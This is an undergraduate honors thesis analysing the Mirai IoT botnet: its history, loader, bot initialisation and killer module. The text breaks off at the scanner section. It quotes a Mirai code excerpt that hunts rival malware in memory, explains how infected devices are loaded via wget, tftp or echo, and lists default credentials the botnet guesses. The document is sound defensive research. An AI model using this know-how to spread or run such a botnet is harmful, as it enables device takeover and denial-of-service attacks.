
THE PENNSYLVANIA STATE UNIVERSITY SCHREYER HONORS COLLEGE

SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

TRACKING MIRAI: AN IN-DEPTH ANALYSIS OF AN IOT BOTNET

MEGHAN CAROLE RIEGEL SUMMER 2017

A thesis submitted in partial fulfillment of the requirements for a baccalaureate degree in Computer Engineering with honors in Computer Engineering

Reviewed and approved* by the following:

Dr. Patrick McDaniel Distinguished Professor of Computer Science and Engineering Thesis Supervisor

Dr. Vijay Narayanan Distinguished Professor of Computer Science and Engineering Honors Adviser

* Signatures are on file in the Schreyer Honors College.

Abstract

Though botnets have been a security problem for a long time, they have recently begun taking advantage of the security vulnerabilities present in connected devices often referred to as the Internet of Things. Mirai, a botnet malware which emerged in mid-2016, has been responsible for the largest DDoS attack on record, a 1.2 Tbps attack on Dyn, a DNS provider. In late 2016, the source code for Mirai was released on a hacker forum. The goal of this thesis is to investigate Mirai, which is responsible for the largest botnets ever seen. We discuss its full functionality, focusing on how it spreads by taking advantage of weak authentication on devices. We take a look at the malware’s strengths and weaknesses and how it may be - and probably currently is being - modified and improved. We collected real Mirai traffic in the wild and investigated how exactly it behaves so that we may distinguish between benign and malicious traffic. We find that Mirai traffic may be fingerprinted using deep-packet inspection and that it has evolved to attack more devices in the past several months. We then use these results to construct a picture of what the Mirai landscape currently looks like and where it is headed.

Table of Contents

List of Figures
List of Tables
Acknowledgments

Chapter 1 Introduction
1.1 Security and Risk in the Internet of Things
1.2 The Mirai Botnet

Chapter 2 Background & Related Works
2.1 History of Worms and Botnets
2.1.1 Early Malware
2.1.2 Sophistication of Malware
2.1.3 Internet of Things Malware
2.2 How Botnets Work
2.2.1 Spread
2.2.2 Infection
2.2.3 Command and Control
2.2.4 Attack

Chapter 3 Mirai Source Code Analysis
3.1 Loader
3.2 Mirai Bot
3.2.1 Initialization
3.2.2 Botnet Killer
3.2.3 Scanner
3.2.3.1 Connection Algorithm
3.2.3.2 Authentication Attempts
3.2.4 Attacker
3.2.5 Constants Table
3.3 Command and Control
3.3.1 Initialization
3.3.2 Admin Interface and API
3.3.3 Attack
3.4 Mirai’s Pseudorandom Number Generator
3.4.1 Randomness Analysis

Chapter 4 Experimental Setup
4.1 Experimental Setup

Chapter 5 Results and Discussion
5.1 Mirai-Infected Device Behavior
5.2 Mirai Traffic Headers
5.2.1 IPv4 Header
5.2.2 TCP Header
5.3 Mirai Traffic Payload
5.3.1 Telnet Negotiation
5.3.2 Linemode
5.3.3 Timing
5.3.4 Credentials Tried
5.4 Locations of Infected Devices
5.5 Traffic Flows
5.6 Distinguishing Mirai from Other Botnet Traffic

Chapter 6 Conclusions & Takeaways
6.1 Where We Are Now
6.2 Improvements to Mirai
6.2.1 Scanning Strategies
6.2.2 Packet Payload
6.2.3 Default Password List
6.2.4 New Vulnerabilities
6.2.5 Attack Vectors & Monetization
6.3 Takeaways

Appendix A Mirai Botnet Source Code Selections
A.1 Hackerforums Blog Post
A.1.1 Preface
A.1.2 Requirements
A.1.3 Infrastructure Overview
A.1.4 Configuring Bot
A.1.5 Configuring CNC
A.1.6 Setting Up Cross Compilers
A.1.7 Building CNC + Bot
A.1.7.1 How to build bot + CNC
A.1.8 Building Echo Loader
A.2 Custom Data Structures
A.2.1 Connection Structure
A.2.2 Scanner Connection Structure
A.2.3 Command and Control Client List
A.3 Constants Table
A.4 Built-in Encoding and Decoding
A.4.1 Encoding Functionality
A.4.2 Decoding Functionality

Appendix B Supplemental Data
B.1 Hardcoded List of Default Credentials
B.2 Credentials Seen in Collections
B.3 Attack Types and Flags
B.4 Dieharder Test Output

Bibliography

List of Figures

1.1 Mirai Timeline

2.1 Timeline of Notable Malware
2.2 A General Botnet Structure

3.1 The Mirai Botnet Structure
3.2 The Mirai Loading Algorithm
3.3 The Mirai Scanning Algorithm
3.4 The Mirai Command and Control Structure
3.5 The Mirai Random Number Generator

5.1 Conventional IoT Device Behavior
5.2 Mirai-Infected IoT Device Behavior
5.3 Benign IPv4 Header [Wireshark]
5.4 Mirai IPv4 Header [Wireshark]
5.5 Benign TCP Header [Wireshark]
5.6 Mirai TCP Header [Wireshark]
5.7 Telnet Session
5.8 Mirai Telnet Session
5.9 Attack Source Heat Map
5.10 Input-Output Graph Device 1 (April 30 - May 1)
5.11 Input-Output Graph Device 2 (April 30 - May 1)
5.12 Input-Output Graph Device 2 (May 3 - May 4)

List of Tables

5.1 Top 10 Source Countries

B.1 Default Credentials Used by Mirai
B.2 Credentials Seen in Collections
B.3 Attack Flags
B.4 Attack Types

Listings

3.1 Killer Memory Search
3.2 Attack Initialization
3.3 Mirai’s Pseudo-Random Number Generator
5.1 Packet Header Initialization
A.1 Connection Struct
A.2 Scanner Connection Struct
A.3 CNC Client List Struct

Acknowledgments

I want to thank everyone who helped make this thesis possible, because without them, I would not be graduating with a Master’s degree. First, to my adviser, Dr. Patrick McDaniel, who guided me through my research and provided significant levels of support. Second, to the rest of the faculty and staff in the Department of Computer Science and Engineering at Penn State for their support and help answering my myriad of questions, especially Dr. Adam Smith and Dr. Vijay Narayanan, my honors adviser. Third, to my family - Mom, Dad, Lauren and Carolyn - for always pushing me to work harder and without whom I would never have pursued the Integrated Undergraduate-Graduate program and received my Master’s degree. I think you all loved my extra football season just as much as I did. Finally, I need to thank my fellow graduate students and my friends. You were always willing to spend long nights with me in the lab, the library, or, most often, Willard. You were willing to impart your specific knowledge on subjects I was not clear on, yet needed to understand in order to complete this thesis. Tech: Thank you for keeping me sane this year when I most needed it!

Dedication

To My Parents.

Mom and Dad, thank you for not only convincing me to attend Penn State and to join the Schreyer Honors College, but for always supporting me and pushing me to do better. I would not be in the place that I am today without you there every step of the way.

I love you!

Chapter 1 | Introduction

Someone has a botnet with capabilities we haven’t seen before. We looked at the traffic coming from the attacking systems, and they weren’t just from one region of the world or from a small subset of networks - they were everywhere.

Martin McKeay - Akamai

The introduction of connected embedded devices - the so-called Internet of Things (IoT) - has already begun to change the landscape of the Internet. This paradigm shift has the potential to provide us with a plethora of new opportunities and new challenges. In 2008, the National Intelligence Council cited the Internet of Things as one of "Six Technologies with Potential Impacts on US Interests out to 2025" [1]. We will be able to, and in many cases already can, collect information from everyday objects that are connected to the Internet. For example, in the past two years, the popularity of home automation has exploded. As of November 2016, an estimated 5.1 million Amazon Echo units had been sold to date [2], which is expected to increase substantially, even with the introduction of the Google Home and the announcement of Apple’s competitor product. These products are meant to control the multitude of home automation products available, an exploding market including Hue lightbulbs, Nest security products and thermostats, Samsung refrigerators, and more. Even our vehicles are joining the Internet of Things, with an estimated 75% of shipped cars in 2020 having some kind of Internet connectivity and an estimated $42 billion autonomous-car industry in 2025 [3]. The Internet of Things doesn’t stop there. We are using connected sensors and embedded devices to monitor agriculture, improve manufacturing, closely track human health, and build smart cities. It is and will be pervasive in almost every industry in both the public and private sector and is expected to be a $470 billion industry by 2020 [4], with an estimated 20.8 billion devices connected in that year [5].

1.1 Security and Risk in the Internet of Things

With the massive potential of the Internet of Things comes immense risk, particularly in the area of security. Here, we define a secure device as one that maintains confidentiality, integrity, and availability (often referred to as the CIA triad) of the device and the information it holds and transmits. Modern PCs are generally very powerful, are updated constantly, and are able to utilize "computationally-secure" cryptographic schemes to maintain confidentiality and integrity of data. Companies that develop their operating systems, like Google, Apple, and Microsoft, build them with security at the forefront. They, along with a wide variety of researchers, have developed good protocols over the past several decades that ensure their systems are secure and work well. Most of the time, exploits against PCs utilize zero-day vulnerabilities or take advantage of weak security practices employed by users. There are hundreds of researchers who are actively improving operating systems and programs to eliminate these vulnerabilities and to improve security usability. Hundreds more are working to educate users on the importance of security and how to be safer online. The security landscape of the Internet of Things is completely different, partially because connected devices are fundamentally different from PCs. These devices are often simple, with a small set of specific functionality. For years, there was no need for security, because they operated in closed systems that could not feasibly be compromised. Now, they are going online and manufacturers are paying little attention to their security, either because they do not care or because their developers do not understand how to implement good security. Many devices use weak default passwords and broken cryptographic protocols. To make matters worse, as such devices are fundamentally simpler than - and different from - a PC, many widely agreed upon protocols will not work or do not make sense in this new context.
The popularity of IoT is exploding too quickly, before security researchers have gotten a chance to catch up. Finally, IoT devices have long shelf-lives and are updated much less frequently than a PC would be - if ever. Considering all of this, IoT has become an extremely attractive - and successful - target for adversaries.

1.2 The Mirai Botnet

On September 20th, 2016, the website Krebs on Security was hit with a DDoS attack by what would become known as the Mirai (Japanese for "the future") botnet [6]. At over 600 Gbps, it was the largest DDoS attack recorded up to that time. It was apparent that the attack was carried out by a botnet, as is typical in DDoS attacks. However, this one was composed of Internet of Things devices, including routers, IP cameras and digital video recorders (DVRs). Less than 2 weeks later, the source code [7] was released on a hacker forum by its supposed author, who used the pseudonym Anna-senpai. It was found to attack IoT devices by brute-force guessing from a hard-coded list of default device usernames and passwords over the Telnet protocol. A few weeks after the release of the Mirai source code, an even larger attack was executed on the DNS service provider Dyn [8]. Several high-profile sites went offline, including GitHub, Airbnb, Twitter, Netflix, and Reddit. Reaching over 1 Tbps, it became the largest attack ever recorded. It was later announced that the attack was caused in part by the Mirai botnet, encompassing millions of bots. Now, Mirai has been found to be so prevalent that even if one resets a device, wiping the malware from memory, the device is expected to be re-infected within minutes unless the password is changed. In October 2016, white-hat hackers began to combat Mirai with some vigilante justice. Hajime is a botnet that attacks the same vulnerabilities as Mirai. Instead of using the devices to attack, it shuts down some of the ports so that Mirai cannot compromise the device [9]. Unfortunately, vigilante justice is rarely the answer. We cannot trust that this botmaster will never use these bots for malicious purposes, nor that he won’t lose control of the botnet.

Figure 1.1. Mirai Timeline

Mirai has forced us to consider the security of the Internet of Things more seriously. The prevalence of connected homes is accelerating yet we have no real solution to the security problem. Scarier still is the notion that it won’t be long before attacks leave the digital world and enter the physical world. Insecure systems make it possible for attacks on our electric grid, on manufacturing systems or on food production systems to threaten our livelihoods. In this thesis, we attempt to begin this conversation through the light of the Mirai problem. We investigate the malware’s source code, focusing on how it spreads to new hosts. We collect malicious traffic from the wild in order to learn exactly how it behaves and perhaps what variants have evolved. Then, we attempt to distinguish between malicious and benign traffic on the telnet port and provide suggestions for improving device security. Finally, we anticipate what Mirai will do next by looking at our results and at malware evolution in history.

Chapter 2 | Background & Related Works

This was not a mistake. He wanted his worm to run on computers all over the United States.

Ellen R. Meltzer - Federal Prosecutor - US vs. Morris

While this thesis explores the Mirai botnet in depth, it is useful to briefly investigate and discuss the malware that preceded it. Then, it may be possible to gain a better understanding of where we are now. From the beginning, computers have attracted the innovative, the curious, and the malicious. Computers and the Internet have always been a source of discovery, of intelligence, and of profit. Malware has been a part of the story from the beginning. Like many varieties of malware, worms are so named to reflect the way their namesakes act in the natural world. Parasitic worms, known collectively as helminths [10], are standalone organisms that live in a host and steal the food it consumes for nourishment. They are able to spread themselves and infect other hosts. Similarly, a worm in the computing world is a standalone piece of software that is able to spread to new vulnerable hosts using a variety of methods. Oftentimes, especially in the context of their use in botnets, they cripple their hosts and/or steal computing resources from their hosts to execute attacks, like DDoS attacks. Botnets are networks of zombie computers that are controlled by a so-called "botmaster" to carry out illicit activities, such as executing DDoS attacks, sending spam emails, or collecting confidential information. They are oftentimes a product of worms, though it is not unheard of for botnets to be created using viruses or Trojans. A virus, like a worm, is so named for its biological counterpart. Viruses are small, cell-level parasites that attack by changing the DNA in a cell, changes which are carried over when the cell replicates. A computer virus, in the same vein, will infect a computer by inserting itself into another program. When the program is executed, the virus is as well. A Trojan is named for the wooden horse that was used in the Greek assault on Troy. It is malware that is designed to look legitimate - a software update, for example.
Trojans tend to rely more on social engineering to spread, unlike worms or viruses [11].

2.1 History of Worms and Botnets

Figure 2.1. Timeline of Notable Malware

2.1.1 Early Malware

The decades-long battle against malware really started in 1988, with the Morris worm. It was the first major worm to infiltrate the Internet and the first to execute a denial-of-service attack. Oddly, this worm originated more from curiosity about a proof-of-concept Internet-wide worm than from malice. Robert Morris was a graduate student at Cornell and, according to him, wrote the worm to estimate the size of the Internet. At the time, the Internet consisted of roughly 60,000 machines, and the Morris worm infected an estimated 10% of them. It spread in a tree structure: exploiting a machine and then trying its neighbors. In particular, it utilized password-guessing attacks, which would remain a popular exploit in worms into the modern day. The Morris worm spread almost too well: it would infect a single computer so many times that the computer wouldn’t have the resources to do anything else and would crash. It took technicians several days to remove the worm from networks, and it showed the research community that malware is in fact a concern and that security should be a priority [12].

In early 2000, the infamous ILOVEYOU worm became the first major adversarial worm to severely cripple the Internet. Written by a student in the Philippines, the malware was sent via email in the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs", which, when opened, immediately executed, overwriting files and sending itself to other users [13]. It didn’t take long for email clients to block directly-executable attachments like VBScript; programmers and users learned to be wary on the Internet. However, malware writers also learned, continuing a cat-and-mouse game that persists today and will continue into the future.

A year later, the Code Red worm appeared in the wild. It exploited a vulnerability in Microsoft’s Internet Information Services web servers that had been announced a month prior. Once on a host, it would spread by generating 100 threads and trying to attack the same vulnerability on other IP addresses via port 80. The worm was very successful. Later analysis showed that the rate of spread first grew exponentially and then slowed as the set of vulnerable hosts on the Internet was saturated [14]. Such spread models are very typical of worms, as they would be for any illness in the physical world [15], and it is only the acceleration of spread that improves, as will be shown later. In the early stages of the spread of Code Red, each server was able to infect 1.8 victim servers per hour. Oddly, Code Red turned itself off after nearly a day and re-awoke a few weeks later, a trend that would also be repeated in other malware. Not long after the emergence of Code Red, two new worms appeared: Code Red II (though its code base was unrelated to Code Red) and Nimda. Code Red II had a localized spread, meaning it was more likely to try IP addresses nearby rather than random addresses across the Internet.

2.1.2 Sophistication of Malware

In 2003, the Internet saw, for the first time, a worm that spread too quickly for humans to effectively intervene. The Slammer worm infected 90% of vulnerable hosts within 10 minutes. It exploited a buffer overflow vulnerability in devices running Microsoft’s SQL server [16]. Just as in the Code Red incident, a patch for this vulnerability had been released prior to the incident, though many vulnerable hosts still resided on the network. At its peak, the worm achieved a scan rate of over 55 million hosts per second and saturated many networks’ bandwidth, causing widespread outages. The Storm worm and botnet, first detected in early 2007, was named for the subject line of the spam emails it would send, a method similar to that of the earlier ILOVEYOU worm. However, Storm was notable because it was one of the first (and one of the most successful) worms to utilize decentralized control servers, which make it harder to shut down [17]. Prior to this development, botnets would typically connect to an Internet Relay Chat (IRC) channel set up by the attacker to receive commands and updates. Slammer and Storm, along with many other worms at the time, were malicious, but had the main goal of disrupting the Internet and communication via DDoS attacks. March 2008 brought Torpig, an insidious Trojan horse that sought to steal sensitive information, like passwords and credit card numbers, for financial gain. It was not the first piece of malware to do so, but the financial damage it caused was unparalleled at the time [18].

2.1.3 Internet of Things Malware

In June 2010, a new type of worm was detected that targeted physical systems. Stuxnet targeted Iran’s nuclear program and was responsible for destroying 20% of the country’s nuclear centrifuges. It entered the system via a thumb drive and was able to destroy the centrifuges while making the monitoring system show normal functionality [19]. While Stuxnet targeted a very specific type of device, it could be tailored to attack essentially any modern SCADA device. In 2013, the first so-called Internet of Things botnet malware appeared. Linux-Darlloz exploited a PHP HTTP POST vulnerability that was present on many IoT devices [20]. In 2014, BASHLITE (also called qbot) gained access to devices via insecure default credentials and exploited a vulnerability in the bash shell to compromise devices running BusyBox [21]. Not long after, the source code was released and by 2016, around one million devices were infected, over 96% of which were IoT devices. In 2016, Mirai appeared. It attacks the same devices as BASHLITE using very similar tactics. It may in fact be a variant of BASHLITE, but due to its ability to erase other malware from the devices it tries to infect, it has been responsible for the largest botnets ever amassed and the largest DDoS attacks ever recorded.

2.2 How Botnets Work

Figure 2.2. A General Botnet Structure

Botnets are large networks of computers controlled by an adversary that are used for nefarious purposes, including distributed denial-of-service attacks, spam, theft, and espionage. The vast majority of botnets are created using worms that spread across networks, connecting computers to a central command-and-control server. While many early worms - and in fact some modern malware - tend to cause noticeable damage on computers almost immediately, modern botnets are more inconspicuous. Botmasters - the malicious users who control botnets - want to amass networks of hundreds of thousands of nodes in order to attack a target whenever they please. If a user does not know that their machine is part of a botnet, the botmaster can continue to fly under the radar and continue to appear disconnected from their crimes. Though botnets have evolved in the past few decades, and though modern botnets exist in a variety of families, the core functionality of a botnet is consistent.

2.2.1 Spread

The primary goal of any botnet is to spread to as many hosts as possible so that attacks are more effective. Spreading quickly without detection is a core problem that a botnet designer faces. A few worms will spread using social engineering methods, like convincing a user to open a malicious email attachment or navigate to a malicious website, while others are found on file sharing (P2P) websites [22]. While such methods are effective, the proliferation rate is limited by the humans spreading them. More effective spreading can be achieved without human interaction, by scanning for vulnerable IPs and attacking them. Early worms targeted devices randomly. They used a random number generator to generate lists of IP addresses and attempted to exploit them. [14] found that Code Red spread exponentially but slowed the more saturated the malware became. Code Red II exploited the same vulnerability as Code Red I but had a more fine-tuned IP address selection process, targeting nearby devices more often instead of spreading randomly across the internet.
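The grow-then-saturate behavior reported for Code Red can be illustrated with a simple epidemic model. The sketch below is an assumption for illustration and is not necessarily the model used in [14]: it takes the logistic equation da/dt = K a (1 - a), where a is the infected fraction of vulnerable hosts, and uses the early Code Red rate of 1.8 infections per host per hour quoted in Section 2.1.1 as K. The function name and the initial infected fraction are hypothetical choices.

```python
import math


def infected_fraction(t_hours, rate_per_hour=1.8, initial_fraction=1e-5):
    """Closed-form solution of da/dt = K * a * (1 - a) with a(0) = a0.

    a(t) = 1 / (1 + ((1 - a0) / a0) * exp(-K * t))
    rate_per_hour (K) and initial_fraction (a0) are illustrative assumptions.
    """
    odds_uninfected = (1.0 - initial_fraction) / initial_fraction
    return 1.0 / (1.0 + odds_uninfected * math.exp(-rate_per_hour * t_hours))


if __name__ == "__main__":
    # Early on the curve grows roughly like exp(K * t); later it flattens
    # as the pool of vulnerable hosts is exhausted.
    for hour in range(0, 13, 2):
        print(f"t = {hour:2d} h  infected fraction = {infected_fraction(hour):.6f}")
```

In this model a faster worm corresponds to a larger K, not a different curve shape, which matches the observation that only the acceleration of spread changes from worm to worm.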

2.2.2 Infection

Typically, an attacker targets a particular vulnerability in a device. This could be anything, and is often a zero-day vulnerability, as computers and servers, the traditional targets for botnets, typically implement relatively adequate security. In the case of BASHLITE and Mirai, weak authentication - the use of default credentials - is exploited. Once inside the target device, the attacker will download the malware binary to it.

2.2.3 Command and Control

Botnets are useless unless a botmaster is able to control them and execute commands. Traditionally, bots connect to a central command and control server. This is the case with Mirai. In the early years of botnets, the addresses of these servers were changed very rarely in order to make it easier for bots to connect and less likely that they would be orphaned. However, the longer the address is static, the easier it will be for law enforcement to find the C&C server and take it down. Modern botmasters typically change the server too often for it to be accurately tracked - or for it to be worth taking down - requiring bots to be more active in connecting and updating the location of the C&C. The vast majority of botnets in the past have used Internet Relay Chat (IRC), an application layer communication protocol, to communicate with a central command-and-control server [23]. It is useful to discuss another command and control strategy often used. Peer-to-Peer botnets utilize a more decentralized command and control. Instead of one C&C server, P2P botnets contain a large number of workers that distribute the control. New bots joining the botnet simply connect to these bots. This setup allows the botnets to be much more robust against infiltration, as losing a worker on the botnet does not dismantle the whole system. Furthermore, it makes it easier for the botnets to evade detection.

2.2.4 Attack

Botnets have been used for a wide variety of nefarious purposes. One of the most common uses, as in the case of Mirai, is to execute DDoS attacks. Recently, the security community has seen an upward trend in DDoS-for-hire services. It used to be that an adversary who wanted to execute a DDoS attack would have to build their own botnet to do so. Now, around $40 buys one hour of DDoS attacks, and many services even offer subscription plans. These services are widely available via a regular Google search and can be purchased with a PayPal account. Incapsula reports that many of them market themselves as stress test services to avoid suspicion from law enforcement [24]. While big DDoS attacks like the one seen on Dyn have increasingly occurred, so have smaller DDoS attacks. A report by A10 Networks says that more than 3700 DDoS attacks occur every day, 93% of which are reliant on DDoS-for-hire services [25]. In fact, in December 2016, 34 individuals were arrested, and a further 101 individuals were warned, in a crackdown on DDoS-for-hire [26]. DDoS attacks are not the only use for botnets. Spam and phishing emails are largely sent with the help of large botnets and account for 95% of all emails [27]. Some botnets are also used for widespread personal information collection and identity theft. Botnets can install keyloggers to collect secret user information, like passwords and credit card information. They can sniff traffic and learn a lot about users.

Chapter 3 | Mirai Source Code Analysis

Today, I have an amazing release for you.

Anna-senpai - Mirai Author

Mirai creates large, resilient, and highly capable IoT botnets that can carry out some of the largest DDoS attacks ever seen. In early October 2016, the Mirai source code was released by its apparent author, Anna-senpai [7] [28]. In a blog post, he attributes the release to increased scrutiny by law enforcement (in his words: "there’s lots of eyes looking at IOT now, so it’s time to GTFO."). Releasing the source code of malicious programs is not uncommon for authors becoming nervous about getting caught. It helps shift the attention away from them; if they are not the only user with the code, it makes them appear less guilty to law enforcement [29]. The supposed identity of Anna-senpai was later revealed by Krebs to likely be a student named Paras Jha at Rutgers University, though the investigation is still ongoing [29]. The Mirai source code is primarily written in C while the command and control is written in Go. In total, the repository investigated contains over 12,000 lines of code in 144 files. Analyses of Mirai have been numerous both before the release of the source code and since [30]. While analyses vary, it is believed that Mirai builds on previous botnet malware and even previous IoT botnet malware such as BASHLITE [29]. BASHLITE, which appeared in 2014, exploits the same weakness as Mirai - default credentials. Mirai’s functionality is very straightforward. See Figure 3.1 for an overview of the structure of a Mirai botnet. It spreads by attempting to connect to randomly selected devices via the Telnet port and then guessing the username and password from a hardcoded list of default credentials (see Table B.1 in Appendix B.1). Most of the credentials found in this list are either exceedingly common (e.g. root:password) or are specific to a manufacturer or device (e.g. root:realtek is a username:password combination for Realtek routers). All of these combinations are likely to target a variety of cameras, routers, DVRs, printers, and more [31].
If Mirai logs in successfully, it downloads the Mirai binary, connects to command and control, and begins spreading to additional hosts. The spreading technique is not new. Botnets have been employing very similar techniques since the first ones appeared over ten years ago. Even the attack method of guessing passwords has been around since at least the Conficker worm in 2008. In addition, Mirai was not even the first piece of malware to attack notoriously insecure IoT devices. What makes Mirai unique is that it was able to corner the market on IoT botnets. It has the ability to not only infect an IoT device, but to delete pre-existing malware on that device. As such, it is able to make its botnet stronger while weakening other currently active botnets. This is readily apparent, as Mirai is responsible for some of the largest DDoS attacks ever recorded. Please note that instances of Mirai in the wild are likely to differ from the source code, as many hackers likely took this code and made improvements or changes. The general functionality of this botnet is likely to be prevalent in the wild, as it is a simple and effective way to take control of the multitude of vulnerable IoT devices online. Trends show that the number of these devices is likely to increase, as manufacturers are paying little attention to security and governments are not mandating it.
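Because Mirai relies entirely on a fixed list of default credentials, a defender can check local devices against the same kind of list. The following is a minimal defensive sketch, not code from the Mirai repository: the two credential pairs are the examples named in the text, the function names and the device inventory format are hypothetical, and a real audit would load the full list from Table B.1.

```python
# Example pairs named in the text; the full hardcoded list is in Table B.1.
KNOWN_DEFAULTS = {("root", "password"), ("root", "realtek")}


def uses_default_credentials(username, password, known_defaults=KNOWN_DEFAULTS):
    """Return True if the (username, password) pair is on the default list."""
    return (username, password) in known_defaults


def audit(devices, known_defaults=KNOWN_DEFAULTS):
    """Return the names of devices whose login is on the default list.

    `devices` maps a device name to a (username, password) tuple; this
    inventory format is an assumption made for the example.
    """
    return sorted(
        name
        for name, (username, password) in devices.items()
        if uses_default_credentials(username, password, known_defaults)
    )


if __name__ == "__main__":
    inventory = {
        "hallway-camera": ("root", "password"),    # still on factory login
        "office-router": ("admin", "c0rrect-h0rse"),  # changed by the owner
    }
    print(audit(inventory))
```

Any device flagged by such a check would be expected to fall to the guessing strategy described above, so changing its password removes it from Mirai's reach.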

Figure 3.1. The Mirai Botnet Structure

3.1 Loader

A device found to be vulnerable to Mirai will be attacked and recruited to join the botnet. The loader is a server separate from the Mirai instances on the individual bots, as sending the binary is very resource intensive. As discussed in section 3.2.3, the bots send authentication information for vulnerable devices to the loader, which carries out the attack. They connect to the loader in the same way they connect to the command and control server (see below). Bots resolve a domain stored in a hardcoded, obfuscated table. Botmasters can easily move the server often to avoid detection. See Figure 3.2 below for a graphical representation of the Mirai Loader.

Figure 3.2. The Mirai Loading Algorithm

When the loader server is initialized, it creates a designated number of so-called workers (threads), 58 by default. Each of these threads will handle attacking a different victim device, which is called an event in the code. The loader listens for the device information from the bots, which is sent in the format ip:port username:password on stdin. When information is received, it is parsed and an attack is added to the attack queue. A thread picks it up and creates a connection structure for the connection instance. It attempts to connect to the device via the Telnet port with the specified credentials, keeping track of the state of the Telnet negotiation process.

Once logged into the device, the worker needs to learn the device’s architecture and how it can most efficiently exploit it. Unfortunately for victims, Mirai, once authenticated via Telnet, is able to issue shell commands to the device using BusyBox. BusyBox is an embedded system utility that is often referred to as the "Swiss army knife of embedded systems". It combines several common Unix commands - like ls, rm, and echo to name a few (see [32] for the full list) - into one small binary. BusyBox is very modular and a user can pick and choose what features to install onto the device, while still keeping the binary tiny. This makes it very attractive for designers of devices like routers; one can interact with the device using familiar commands while keeping the power low and size small.

Embedded devices are, more often than not, much simpler than a typical personal computer. As such, they usually do not have all of the packages that a complex device will have. Mirai is able to account for such cases and attack even the simplest of devices. The typical method for many Linux computers to download a binary is wget, and some others use tftp (Trivial File Transfer Protocol). Extremely simple and resource-limited devices have neither, which makes it much more difficult to transfer files and binaries to the device.

When attacking a device, after discovering the architecture, Mirai checks whether it has wget or tftp installed. If so, it uses those programs to download the Mirai binary to the victim device. Once the loader verifies the download is successful, the Telnet connection is closed and the new bot proceeds with the initialization described in section 3.2.1. Mirai is still able to spread to very simple devices that have neither wget nor tftp installed. It uses the echo command to install a small binary that downloads the real binary. Mirai does this instead of echo loading the entire binary directly in order to free up resources on the loader and save time. This process is described by the author in Appendix A.1.8.
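The input format read by the loader lends itself to a short parsing sketch. The C fragment below is a minimal illustration and not the loader's actual code: the names loader_target and parse_target_line are hypothetical, and it assumes an IPv4 dotted-quad address and non-empty credentials that contain no spaces.

```c
#include <stdio.h>

/* Hypothetical container for one reported device (names are illustrative). */
struct loader_target {
    char ip[16];          /* dotted-quad IPv4 address */
    unsigned int port;    /* Telnet port reported by the bot */
    char user[32];
    char pass[32];
};

/* Parse one "ip:port username:password" line.
 * Returns 1 on success and 0 if the line does not match the format. */
int parse_target_line(const char *line, struct loader_target *out)
{
    int n = sscanf(line, "%15[0-9.]:%u %31[^: \n]:%31[^ \n]",
                   out->ip, &out->port, out->user, out->pass);
    return n == 4 && out->port <= 65535;
}
```

A caller would read lines from stdin, pass each one to parse_target_line, and queue the resulting structure for a worker thread. Empty passwords, which do occur among default credentials, would need an extra case that this sketch omits.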

3.2 Mirai Bot

The files in the bot directory within the mirai directory are responsible for the bulk of the functionality for an actively spreading bot. Contained in this directory are the Killer (Section 3.2.2), Scanner (Section 3.2.3), and Attacker (Section 3.2.4).

3.2.1 Initialization

The instance of the Mirai bot on a device is initialized in main.c within the bot directory. Mirai is loaded into memory on the device, so the first thing it does is obfuscate its process names on the machine to make it more difficult to detect. It then pings the watchdog to ensure that the device is not rebooted. Next, Mirai makes sure it is the only malware running on the device by killing any pre-existing malware. See Section 3.2.2 for a full discussion of this process. Anecdotal evidence suggests that this works well. In a different blog post by Anna-senpai, he brags that he wrote a Telnet bot killer, and the comments by other hackers seemed to confirm his boasting [29] [33]. Mirai then initializes the attack, kill, and scan functionality, all of which are described below. Once everything is initialized, it connects to the command and control server by resolving a domain hardcoded in the program. As long as the adversary keeps the domain but changes the actual server address, they can avoid researchers who attempt to track down the server and shut down the botnet.

3.2.2 Botnet Killer

Mirai, once installed on a device, will initialize a killer that targets other malware trying to run on the device. This is a feature that is not present on any previous IoT botnets. It kills the services running on port 23 (Telnet), 22 (SSH), and 80 (HTTP). Every KILLER_RESTART_SCAN_TIME, all processes running on the device are scanned in order to search for - and kill - competing malware.

Listing 3.1. Killer Memory Search

    // Retrieve the de-obfuscated signatures of competing malware
    m_qbot_report = table_retrieve_val(TABLE_MEM_QBOT, &m_qbot_len);
    m_qbot_http = table_retrieve_val(TABLE_MEM_QBOT2, &m_qbot2_len);
    m_qbot_dup = table_retrieve_val(TABLE_MEM_QBOT3, &m_qbot3_len);
    m_upx_str = table_retrieve_val(TABLE_MEM_UPX, &m_upx_len);
    m_zollard = table_retrieve_val(TABLE_MEM_ZOLLARD, &m_zollard_len);

    // Read the process image in chunks and search each chunk for a signature
    while ((ret = read(fd, rdbuf, sizeof (rdbuf))) > 0)
    {
        if (mem_exists(rdbuf, ret, m_qbot_report, m_qbot_len) ||
            mem_exists(rdbuf, ret, m_qbot_http, m_qbot2_len) ||
            mem_exists(rdbuf, ret, m_qbot_dup, m_qbot3_len) ||
            mem_exists(rdbuf, ret, m_upx_str, m_upx_len) ||
            mem_exists(rdbuf, ret, m_zollard, m_zollard_len))
        {
            found = TRUE;
            break;
        }
    }
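Listing 3.1 relies on a helper, mem_exists, whose body is not shown. As a rough idea of what such a helper has to do, the following C sketch searches a buffer for a byte pattern. It is an assumption-laden illustration, not the author's implementation; the name mem_contains and its signature are hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Return 1 if the byte pattern `needle` occurs anywhere in `buf`, else 0.
 * memcmp is used instead of strstr because the buffer holds raw process
 * memory, which may contain NUL bytes. */
int mem_contains(const char *buf, size_t buf_len,
                 const char *needle, size_t needle_len)
{
    if (needle_len == 0 || needle_len > buf_len)
        return 0;
    for (size_t i = 0; i + needle_len <= buf_len; i++) {
        if (memcmp(buf + i, needle, needle_len) == 0)
            return 1;
    }
    return 0;
}
```

Note that a search performed chunk by chunk, as in the loop of Listing 3.1, would miss a signature that straddles two consecutive reads.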

The released source code targets a piece of malware called Kami (aka Anime). Kami is also a Telnet botnet that attacks using hardcoded credentials. It resides in a folder called .anime, which Mirai searches for [34]. If found, Mirai kills the process. In addition to searching for Kami, Mirai targets three varieties of Qbot (BASHLITE), which was discussed earlier. It also targets Darlloz, a PHP botnet that targets IoT devices and first appeared in 2013. Darlloz also operates on port 23 [20] and exploits a PHP HTTP POST request vulnerability that was discovered in 2012.

3.2.3 Scanner

